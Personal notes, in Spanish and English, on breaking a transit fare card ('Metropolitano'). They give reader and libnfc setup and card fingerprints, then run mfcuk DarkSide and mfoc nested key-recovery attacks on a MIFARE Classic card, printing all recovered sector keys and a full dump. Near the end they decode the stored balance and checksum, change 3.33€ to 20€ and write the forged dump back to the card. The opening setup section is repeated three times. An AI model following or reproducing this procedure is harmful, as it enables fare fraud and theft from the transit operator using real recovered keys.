
Packages for CentOs 7
=========================

Install pcsc-lite 1.8
yum install pcsc-tools


Parece solo ser compatible con install pcsc-lite 1.3.3 .
wget https://www.acs.com.hk/download-driver-unified/5128/ACS-Unified-PKG-Lnx-114-P.zip
unzip -d acr122u ACS-Unified-PKG-Lnx-114-P.zip

yum install pcsc-lite-acsccid-1.1.4-1.el7.centos.x86_64.rpm

Download libNFC 
git clone https://github.com/nfc-tools/libnfc
yum install libusb-devel

autoreconf -vis
./configure --enable-doc
make
sudo make install

#Muestra los dispositivos conectados.
nfc-list


Cracks
===========0
Tarjeta del metropolitano:

Packages for CentOs 7
=========================

Install pcsc-lite 1.8
yum install pcsc-tools


Parece solo ser compatible con install pcsc-lite 1.3.3 .
wget https://www.acs.com.hk/download-driver-unified/5128/ACS-Unified-PKG-Lnx-114-P.zip
unzip -d acr122u ACS-Unified-PKG-Lnx-114-P.zip

yum install pcsc-lite-acsccid-1.1.4-1.el7.centos.x86_64.rpm

Download libNFC 
git clone https://github.com/nfc-tools/libnfc
yum install libusb-devel

autoreconf -vis
./configure --enable-doc
make
sudo make install

#Muestra los dispositivos conectados.
nfc-list


Cracks
===========0
Tarjeta del metropolitano:

Packages for CentOs 7
=========================

Install pcsc-lite 1.8
yum install pcsc-tools


Parece solo ser compatible con install pcsc-lite 1.3.3 .
wget https://www.acs.com.hk/download-driver-unified/5128/ACS-Unified-PKG-Lnx-114-P.zip
unzip -d acr122u ACS-Unified-PKG-Lnx-114-P.zip

yum install pcsc-lite-acsccid-1.1.4-1.el7.centos.x86_64.rpm

Download libNFC 
git clone https://github.com/nfc-tools/libnfc
yum install libusb-devel

autoreconf -vis
./configure --enable-doc
make
sudo make install

#Muestra los dispositivos conectados.
nfc-list


Cracks
===========0
Tarjeta del flexible metropolitano:

Mon Oct  2 18:00:58 2017
Reader 0: ACS ACR122U 00 00
  Card state: Card inserted, 
  ATR: 3B 8F 80 01 80 4F 0C A0 00 00 03 06 03 00 03 00 00 00 00 68

ATR: 3B 8F 80 01 80 4F 0C A0 00 00 03 06 03 00 03 00 00 00 00 68
+ TS = 3B --> Direct Convention
+ T0 = 8F, Y(1): 1000, K: 15 (historical bytes)
  TD(1) = 80 --> Y(i+1) = 1000, Protocol T = 0 
-----
  TD(2) = 01 --> Y(i+1) = 0000, Protocol T = 1 
-----
+ Historical bytes: 80 4F 0C A0 00 00 03 06 03 00 03 00 00 00 00
  Category indicator byte: 80 (compact TLV data object)
    Tag: 4, len: F (initial access data)
      Initial access data: 0C A0 00 00 03 06 03 00 03 00 00 00 00
+ TCK = 68 (correct checksum)

Possibly identified card (using /usr/share/pcsc/smartcard_list.txt):
3B 8F 80 01 80 4F 0C A0 00 00 03 06 03 00 03 00 00 00 00 68
3B 8F 80 01 80 4F 0C A0 00 00 03 06 .. 00 03 00 00 00 00 ..
	Mifare Ultralight (as per PCSC std part3)
3B 8F 80 01 80 4F 0C A0 00 00 03 06 03 00 03 00 00 00 00 68
3B 8F 80 01 80 4F 0C A0 00 00 03 06 03 .. .. 00 00 00 00 ..
	RFID - ISO 14443 Type A Part 3 (as per PCSC std part3)
3B 8F 80 01 80 4F 0C A0 00 00 03 06 03 00 03 00 00 00 00 68
	RFID - ISO 14443 Type A - NXP Mifare Ultralight or UltralightC

Tarjeta Rigida del Metropolitano
********************

Mon Oct  2 18:02:25 2017
Reader 0: ACS ACR122U 00 00
  Card state: Card inserted, 
  ATR: 3B 81 80 01 80 80

ATR: 3B 81 80 01 80 80
+ TS = 3B --> Direct Convention
+ T0 = 81, Y(1): 1000, K: 1 (historical bytes)
  TD(1) = 80 --> Y(i+1) = 1000, Protocol T = 0 
-----
  TD(2) = 01 --> Y(i+1) = 0000, Protocol T = 1 
-----
+ Historical bytes: 80
  Category indicator byte: 80 (compact TLV data object)
+ TCK = 80 (correct checksum)

Possibly identified card (using /usr/share/pcsc/smartcard_list.txt):
3B 81 80 01 80 80
	RFID - ISO 14443 Type A - NXP DESFire or DESFire EV1
	"Reiner LoginCard" (or "OWOK", how they name it) - they have been distributed by a german computer magazine ("Computer BILD")
	https://cardlogin.reiner-sct.com/
	Belgium A-kaart (Antwerp citycard)
	Oyster card - Transport for London
	http://en.wikipedia.org/wiki/Oyster_card
	Kaba Legic Advant 4k

Tarjeta Metropolitano Autobus Amarillo
=======================================00
on Oct  2 18:07:56 2017
Reader 0: ACS ACR122U 00 00
  Card state: Card inserted, 
  ATR: 3B 8F 80 01 80 4F 0C A0 00 00 03 06 03 00 01 00 00 00 00 6A

ATR: 3B 8F 80 01 80 4F 0C A0 00 00 03 06 03 00 01 00 00 00 00 6A
+ TS = 3B --> Direct Convention
+ T0 = 8F, Y(1): 1000, K: 15 (historical bytes)
  TD(1) = 80 --> Y(i+1) = 1000, Protocol T = 0 
-----
  TD(2) = 01 --> Y(i+1) = 0000, Protocol T = 1 
-----
+ Historical bytes: 80 4F 0C A0 00 00 03 06 03 00 01 00 00 00 00
  Category indicator byte: 80 (compact TLV data object)
    Tag: 4, len: F (initial access data)
      Initial access data: 0C A0 00 00 03 06 03 00 01 00 00 00 00
+ TCK = 6A (correct checksum)

Possibly identified card (using /usr/share/pcsc/smartcard_list.txt):
3B 8F 80 01 80 4F 0C A0 00 00 03 06 03 00 01 00 00 00 00 6A
3B 8F 80 01 80 4F 0C A0 00 00 03 06 .. 00 01 00 00 00 00 ..
	Mifare Standard 1K (as per PCSC std part3)
3B 8F 80 01 80 4F 0C A0 00 00 03 06 03 00 01 00 00 00 00 6A
3B 8F 80 01 80 4F 0C A0 00 00 03 06 03 .. .. 00 00 00 00 ..
	RFID - ISO 14443 Type A Part 3 (as per PCSC std part3)
3B 8F 80 01 80 4F 0C A0 00 00 03 06 03 00 01 00 00 00 00 6A
	Philips MIFARE Standard (1 Kbytes EEPROM)
	http://www.nxp.com/#/pip/pip=[pfp=41863]|pp=[t=pfp,i=41863]
	RFID - ISO 14443 Type A - Transport for London Oyster
	ACOS5/1k Mirfare
	RFID - ISO 14443 Type A - NXP Mifare card with 1k EEPROM
	vivotech ViVOcard Contactless Test Card
	Bangkok BTS Sky SmartPass


Ataue practico
************************************************************

sudo dnf install libnfc libnfc-devel libnfc-examples

mfcuk
=======

Running (most basic):
    ./mfcuk -C -R 0:A -v 2

PACKAGE
-------
MiFare Classic Universal toolKit (MFCUK)

TOOL(S)
-------
Mifare Classic DarkSide Key Recovery Tool (mfcuk_keyrecovery_darkside.c) (previously known as zv_mf_dark_side)


git clone https://github.com/nfc-tools/mfcuk
autoreconf -vis
./configure
sudo make
sudo make install

ls /usr/local/bin/mfcuk  -la


mfock
======
git clone https://github.com/nfc-tools/mfoc
autoreconf -vis
./configure
sudo make
sudo make install
ls /usr/local/bin/mfoc -la

Check the NFC reader
=====================
$ nfc-list
nfc-list uses libnfc 1.7.1
NFC device: ACS / ACR122U PICC Interface opened


export LD_LIBRARY_PATH=/usr/local/lib/ 
mfoc -f ../../myRecoveredKeys.txt  -O testClaves_ja.dmp

$ mfoc -O test_card_dump
mfoc: ERROR: 

No sector encrypted with the default key has been found, exiting..


$ mfcuk -C -R 0:A -v 2

INFO: block 3 recovered KEY: 0172066b2f03
 1 2 3 4 5 6 7 8 9 a b c d e f


ACTION RESULTS MATRIX AFTER RECOVER - UID fc c7 f1 4b - TYPE 0x08 (MC1K)
---------------------------------------------------------------------
Sector	|    Key A	|ACTS | RESL	|    Key B	|ACTS | RESL
---------------------------------------------------------------------
0	|  0172066b2f03	| . R | . R	|  000000000000	| . . | . .
1	|  000000000000	| . . | . .	|  000000000000	| . . | . .
2	|  000000000000	| . . | . .	|  000000000000	| . . | . .
3	|  000000000000	| . . | . .	|  000000000000	| . . | . .
4	|  000000000000	| . . | . .	|  000000000000	| . . | . .
5	|  000000000000	| . . | . .	|  000000000000	| . . | . .
6	|  000000000000	| . . | . .	|  000000000000	| . . | . .
7	|  000000000000	| . . | . .	|  000000000000	| . . | . .
8	|  000000000000	| . . | . .	|  000000000000	| . . | . .
9	|  000000000000	| . . | . .	|  000000000000	| . . | . .
10	|  000000000000	| . . | . .	|  000000000000	| . . | . .
11	|  000000000000	| . . | . .	|  000000000000	| . . | . .
12	|  000000000000	| . . | . .	|  000000000000	| . . | . .
13	|  000000000000	| . . | . .	|  000000000000	| . . | . .
14	|  000000000000	| . . | . .	|  000000000000	| . . | . .
15	|  000000000000	| . . | . .	|  000000000000	| . . | . .


$ mfoc -O carddump.dmp -k 0172066b2f03

Auth with all sectors succeeded, dumping keys to a file!
Block 63, type A, key 3f3865fccb69 :00  00  00  00  00  00  7f  07  88  69  00  00  00  00  00  00  
Block 62, type A, key 3f3865fccb69 :22  29  50  fa  c1  00  00  4f  02  2b  00  01  02  0b  01  8d  
Block 61, type A, key 3f3865fccb69 :21  93  52  cc  c1  00  00  4f  01  cd  00  02  02  0b  01  3f  
Block 60, type A, key 3f3865fccb69 :21  90  49  bd  c1  00  00  4f  02  24  00  01  02  0c  01  4c  
Block 59, type A, key f3864fcca693 :00  00  00  00  00  00  7f  07  88  69  00  00  00  00  00  00  
Block 58, type A, key f3864fcca693 :21  8e  55  86  c1  00  00  4f  05  a2  00  02  02  12  01  a4  
Block 57, type A, key f3864fcca693 :21  8e  4d  19  c1  00  00  4f  01  46  00  02  02  0e  00  1e  
Block 56, type A, key f3864fcca693 :21  8e  4d  17  04  3c  01  f4  01  46  00  02  02  0e  00  1e  
Block 55, type A, key 3864fcba5937 :00  00  00  00  00  00  7f  07  88  69  00  00  00  00  00  00  
Block 54, type A, key 3864fcba5937 :21  8d  62  7d  c1  00  00  4f  02  2b  00  01  02  0b  01  53  
Block 53, type A, key 3864fcba5937 :21  8c  53  09  c1  00  00  4f  02  2b  00  01  02  0b  01  75  
Block 52, type A, key 3864fcba5937 :21  8a  aa  4f  c1  00  00  4f  01  46  00  02  02  0e  00  17  
Block 51, type A, key 863fcb959373 :00  00  00  00  00  00  7f  07  88  69  00  00  00  00  00  00  
Block 50, type A, key 863fcb959373 :21  8a  aa  4e  c1  00  00  4f  01  46  00  02  02  0e  00  17  
Block 49, type A, key 863fcb959373 :21  7e  69  22  c2  f4  00  01  01  2f  00  01  02  12  01  f4  
Block 48, type A, key 863fcb959373 :21  7e  66  5c  c1  fd  00  4f  05  e7  00  01  01  f4  00  00  
Block 47, type A, key 63fca9492f38 :00  00  00  00  00  00  7f  07  88  69  00  00  00  00  00  00  
Block 46, type A, key 63fca9492f38 :21  7e  5a  83  c2  01  00  00  05  df  00  02  01  f4  02  12  
Block 45, type A, key 63fca9492f38 :21  7e  59  07  c1  00  00  4f  01  46  00  02  02  12  01  87  
Block 44, type A, key 63fca9492f38 :21  7e  58  f8  04  22  01  f4  01  46  00  02  02  12  01  87  
Block 43, type A, key 2fca8492f386 :00  00  00  00  00  00  7f  07  88  69  00  00  00  00  00  00  
Block 42, type A, key 2fca8492f386 :21  7c  52  ce  c1  00  00  4f  02  2b  00  01  02  0b  01  3d  
Block 41, type A, key 2fca8492f386 :21  77  59  3c  c1  00  00  4f  01  43  00  01  02  0b  01  58  
Block 40, type A, key 2fca8492f386 :21  76  43  0a  c1  00  00  4f  02  2b  00  01  02  0b  01  8d  
Block 39, type A, key fc9839273862 :00  00  00  00  00  00  7f  07  88  69  00  00  00  00  00  00  
Block 38, type A, key fc9839273862 :21  75  54  a6  c1  00  00  4f  02  2b  00  01  02  0b  01  8d  
Block 37, type A, key fc9839273862 :21  53  59  59  c1  00  00  4f  01  46  00  02  02  0e  00  18  
Block 36, type A, key fc9839273862 :21  51  53  1c  c1  00  00  4f  02  2b  00  01  02  0b  01  47  
Block 35, type A, key c9739233861f :00  00  00  00  00  00  7f  07  88  69  00  00  00  00  00  00  
Block 34, type A, key c9739233861f :22  66  a0  48  c1  00  00  4f  02  3e  00  01  02  0e  00  25  
Block 33, type A, key c9739233861f :22  66  71  e3  c1  00  00  4f  02  3e  00  01  02  0e  00  1a  
Block 32, type A, key c9739233861f :22  66  4b  47  c1  00  00  4f  01  46  00  02  02  0e  00  18  
Block 31, type A, key 87291f3861fc :00  00  00  00  00  00  7f  07  88  69  00  00  00  00  00  00  
Block 30, type A, key 87291f3861fc :22  66  4b  45  04  fb  03  e8  01  46  00  02  02  0e  00  18  
Block 29, type A, key 87291f3861fc :22  4d  52  e5  c1  00  00  4f  02  2b  00  01  02  0b  01  40  
Block 28, type A, key 87291f3861fc :22  30  52  e1  c1  00  00  4f  02  2b  00  01  02  0b  01  73  
Block 27, type A, key 6291b3860fc8 :00  00  00  00  00  00  7f  07  88  69  00  00  00  00  00  00  
Block 26, type A, key 6291b3860fc8 :00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  
Block 25, type A, key 6291b3860fc8 :22  66  a0  48  00  00  00  00  00  00  00  00  22  66  a0  48  
Block 24, type A, key 6291b3860fc8 :22  66  a0  48  00  00  00  00  00  00  00  00  22  66  a0  48  
Block 23, type A, key 29173860fc76 :00  00  00  00  00  00  7f  07  88  69  00  00  00  00  00  00  
Block 22, type A, key 29173860fc76 :22  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  
Block 21, type A, key 29173860fc76 :08  22  66  00  00  00  00  00  00  00  00  00  06  00  08  00  
Block 20, type A, key 29173860fc76 :08  22  66  00  00  00  00  00  00  00  00  00  06  00  08  00  
Block 19, type A, key 913385ffb752 :00  00  00  00  00  00  7f  07  88  69  00  00  00  00  00  00  
Block 18, type A, key 913385ffb752 :00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  
Block 17, type A, key 913385ffb752 :00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  
Block 16, type A, key 913385ffb752 :00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  
Block 15, type A, key 0f385ffb6529 :00  00  00  00  00  00  7f  07  88  69  00  00  00  00  00  00  
Block 14, type A, key 0f385ffb6529 :00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  
Block 13, type A, key 0f385ffb6529 :00  00  00  00  ff  ff  ff  ff  00  00  00  00  00  ff  00  ff  
Block 12, type A, key 0f385ffb6529 :00  00  00  00  ff  ff  ff  ff  00  00  00  00  00  ff  00  ff  
Block 11, type A, key b385efa64290 :00  00  00  00  00  00  7f  07  88  69  00  00  00  00  00  00  
Block 10, type A, key b385efa64290 :00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  
Block 09, type A, key b385efa64290 :00  00  00  00  ff  ff  ff  ff  00  00  00  00  00  ff  00  ff  
Block 08, type A, key b385efa64290 :00  00  00  00  ff  ff  ff  ff  00  00  00  00  00  ff  00  ff  
Block 07, type A, key 385efa542907 :00  00  00  00  00  00  7f  07  88  69  00  00  00  00  00  00  
Block 06, type A, key 385efa542907 :a6  00  80  27  00  00  18  83  00  09  00  02  00  04  00  05  
Block 05, type A, key 385efa542907 :0e  03  00  00  f1  fc  ff  ff  0e  03  00  00  ff  00  ff  00  
Block 04, type A, key 385efa542907 :0e  03  00  00  f1  fc  ff  ff  0e  03  00  00  ff  00  ff  00  
Block 03, type A, key 0172066b2f03 :00  00  00  00  00  00  ff  07  80  69  00  00  00  27  00  00  
Block 02, type A, key 0172066b2f03 :00  00  00  00  00  00  00  00  1b  5a  11  46  39  45  02  00  
Block 01, type A, key 0172066b2f03 :02  aa  11  46  2c  65  03  00  00  00  00  00  00  00  00  00  
Block 00, type A, key 0172066b2f03 :fc  c7  f1  4b  81  88  04  00  47  c1  2d  ab  41  00  38  07 


Test Tarjeta 3 con las claves conocidas.
_________________________________________

mfoc -f keys.txt -O carddump.dmp

The custom key 0x0172066b2f03 has been added to the default keys
The custom key 0x000000270000 has been added to the default keys
The custom key 0x385efa542907 has been added to the default keys
The custom key 0x70172066b2f0 has been added to the default keys
The custom key 0xb385efa64290 has been added to the default keys
The custom key 0x0b0172066b2f has been added to the default keys
The custom key 0x0f385ffb6529 has been added to the default keys
The custom key 0xf0f0172066b2 has been added to the default keys
The custom key 0x913385ffb752 has been added to the default keys
The custom key 0x2f130172066b has been added to the default keys
The custom key 0x29173860fc76 has been added to the default keys
The custom key 0xb2f170172066 has been added to the default keys
The custom key 0x6291b3860fc8 has been added to the default keys
The custom key 0x6b2f1b017206 has been added to the default keys
The custom key 0x87291f3861fc has been added to the default keys
The custom key 0x66b2f1f01720 has been added to the default keys
The custom key 0xc9739233861f has been added to the default keys
The custom key 0x066b2f230172 has been added to the default keys
The custom key 0xfc9839273862 has been added to the default keys
The custom key 0x2066b2f27017 has been added to the default keys
The custom key 0x2fca8492f386 has been added to the default keys
The custom key 0x72066b2f2b01 has been added to the default keys
The custom key 0x63fca9492f38 has been added to the default keys
The custom key 0x172066b2f2f0 has been added to the default keys
The custom key 0x863fcb959373 has been added to the default keys
The custom key 0x0172066b2f33 has been added to the default keys
The custom key 0x3864fcba5937 has been added to the default keys
The custom key 0x70172066b2f3 has been added to the default keys
The custom key 0xf3864fcca693 has been added to the default keys
The custom key 0x3b0172066b2f has been added to the default keys
The custom key 0x3f3865fccb69 has been added to the default keys
The custom key 0xf3f0172066b2 has been added to the default keys
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  04  
* UID size: single
* bit frame anticollision supported
       UID (NFCID1): 92  42  17  d0  
      SAK (SEL_RES): 08  
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
* SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: 0172066b2f03] -> [x...............]
[Key: 000000270000] -> [x...............]
[Key: 385efa542907] -> [x/..............]
[Key: 70172066b2f0] -> [xx..............]
[Key: b385efa64290] -> [xx/.............]
[Key: 0b0172066b2f] -> [xxx.............]
[Key: 0f385ffb6529] -> [xxx/............]
[Key: f0f0172066b2] -> [xxxx............]
[Key: 913385ffb752] -> [xxxx/...........]
[Key: 2f130172066b] -> [xxxxx...........]
[Key: 29173860fc76] -> [xxxxx/..........]
[Key: b2f170172066] -> [xxxxxx..........]
[Key: 6291b3860fc8] -> [xxxxxx/.........]
[Key: 6b2f1b017206] -> [xxxxxxx.........]
[Key: 87291f3861fc] -> [xxxxxxx/........]
[Key: 66b2f1f01720] -> [xxxxxxxx........]
[Key: c9739233861f] -> [xxxxxxxx/.......]
[Key: 066b2f230172] -> [xxxxxxxxx.......]
[Key: fc9839273862] -> [xxxxxxxxx/......]
[Key: 2066b2f27017] -> [xxxxxxxxxx......]
[Key: 2fca8492f386] -> [xxxxxxxxxx/.....]
[Key: 72066b2f2b01] -> [xxxxxxxxxxx.....]
[Key: 63fca9492f38] -> [xxxxxxxxxxx/....]
[Key: 172066b2f2f0] -> [xxxxxxxxxxxx....]
[Key: 863fcb959373] -> [xxxxxxxxxxxx/...]
[Key: 0172066b2f33] -> [xxxxxxxxxxxxx...]
[Key: 3864fcba5937] -> [xxxxxxxxxxxxx/..]
[Key: 70172066b2f3] -> [xxxxxxxxxxxxxx..]
[Key: f3864fcca693] -> [xxxxxxxxxxxxxx/.]
[Key: 3b0172066b2f] -> [xxxxxxxxxxxxxxx.]
[Key: 3f3865fccb69] -> [xxxxxxxxxxxxxxx/]
[Key: f3f0172066b2] -> [xxxxxxxxxxxxxxxx]
[Key: ffffffffffff] -> [xxxxxxxxxxxxxxxx]
[Key: a0a1a2a3a4a5] -> [xxxxxxxxxxxxxxxx]
[Key: d3f7d3f7d3f7] -> [xxxxxxxxxxxxxxxx]
[Key: 000000000000] -> [xxxxxxxxxxxxxxxx]
[Key: b0b1b2b3b4b5] -> [xxxxxxxxxxxxxxxx]
[Key: 4d3a99c351dd] -> [xxxxxxxxxxxxxxxx]
[Key: 1a982c7e459a] -> [xxxxxxxxxxxxxxxx]
[Key: aabbccddeeff] -> [xxxxxxxxxxxxxxxx]
[Key: 714c5c886e97] -> [xxxxxxxxxxxxxxxx]
[Key: 587ee5f9350f] -> [xxxxxxxxxxxxxxxx]
[Key: a0478cc39091] -> [xxxxxxxxxxxxxxxx]
[Key: 533cb6c723f6] -> [xxxxxxxxxxxxxxxx]
[Key: 8fd0a4f256e9] -> [xxxxxxxxxxxxxxxx]

Sector 00 - Found   Key A: 0172066b2f03 Found   Key B: 000000270000
Sector 01 - Found   Key A: 385efa542907 Found   Key B: 70172066b2f0
Sector 02 - Found   Key A: b385efa64290 Found   Key B: 0b0172066b2f
Sector 03 - Found   Key A: 0f385ffb6529 Found   Key B: f0f0172066b2
Sector 04 - Found   Key A: 913385ffb752 Found   Key B: 2f130172066b
Sector 05 - Found   Key A: 29173860fc76 Found   Key B: b2f170172066
Sector 06 - Found   Key A: 6291b3860fc8 Found   Key B: 6b2f1b017206
Sector 07 - Found   Key A: 87291f3861fc Found   Key B: 66b2f1f01720
Sector 08 - Found   Key A: c9739233861f Found   Key B: 066b2f230172
Sector 09 - Found   Key A: fc9839273862 Found   Key B: 2066b2f27017
Sector 10 - Found   Key A: 2fca8492f386 Found   Key B: 72066b2f2b01
Sector 11 - Found   Key A: 63fca9492f38 Found   Key B: 172066b2f2f0
Sector 12 - Found   Key A: 863fcb959373 Found   Key B: 0172066b2f33
Sector 13 - Found   Key A: 3864fcba5937 Found   Key B: 70172066b2f3
Sector 14 - Found   Key A: f3864fcca693 Found   Key B: 3b0172066b2f
Sector 15 - Found   Key A: 3f3865fccb69 Found   Key B: f3f0172066b2


Manejar lecturas/escrituras usando nfc-mfclassic
=================================================

Hay que incluir el u sino no funciona!!

sudo nfc-mfclassic w b cardtocopy.dmp blank-chinese.dmp

nfc-mfclassic w b mycard_last.mfc carddump.dmp 
nfc-mfclassic r a mycard_last.mfc carddump.dmp 

Con la actualización de los driver empleando pcsc.
sudo dnf install colordiff
diff -y <(hexdump -C ../carddump.dmp) <(hexdump -C my_mfoc_card.mfc) | colordiff

pscd -f -dls -la
sudo dnf install pcsc-tools
sudo dnf install pcsc-lite pcsc-lite-ccid pcsc-tools coolkey opensc
sudo systemctl start pcscd.service

pcsc_scan
nfc-mfclassic r a mycard_last.mfc carddump.dmp

El saldo actual es 014D 
00000040  4d 01 00 00 b2 fe ff ff  4d 01 00 00 00 ff 00 ff
	Saldo: 014D -> 3.33€
	b2 fe => Esto es FFFF - 4D01 => B2FE esto es el check.
	
Ahora recargamos con el nuevo saldo (20€): 
00000040  4d 01 00 00 b2 fe ff ff  4d 01 00 00 00 ff 00 ff
	Saldo: 20.00€ -> 7D0 => Invertimos el LSB MSB => D0 07
	2FF8 => Esto es FFFF - D0 07 => 2FF8 esto es el check.

nfc-mfclassic w b recharged.mfc ../carddump.dmp 
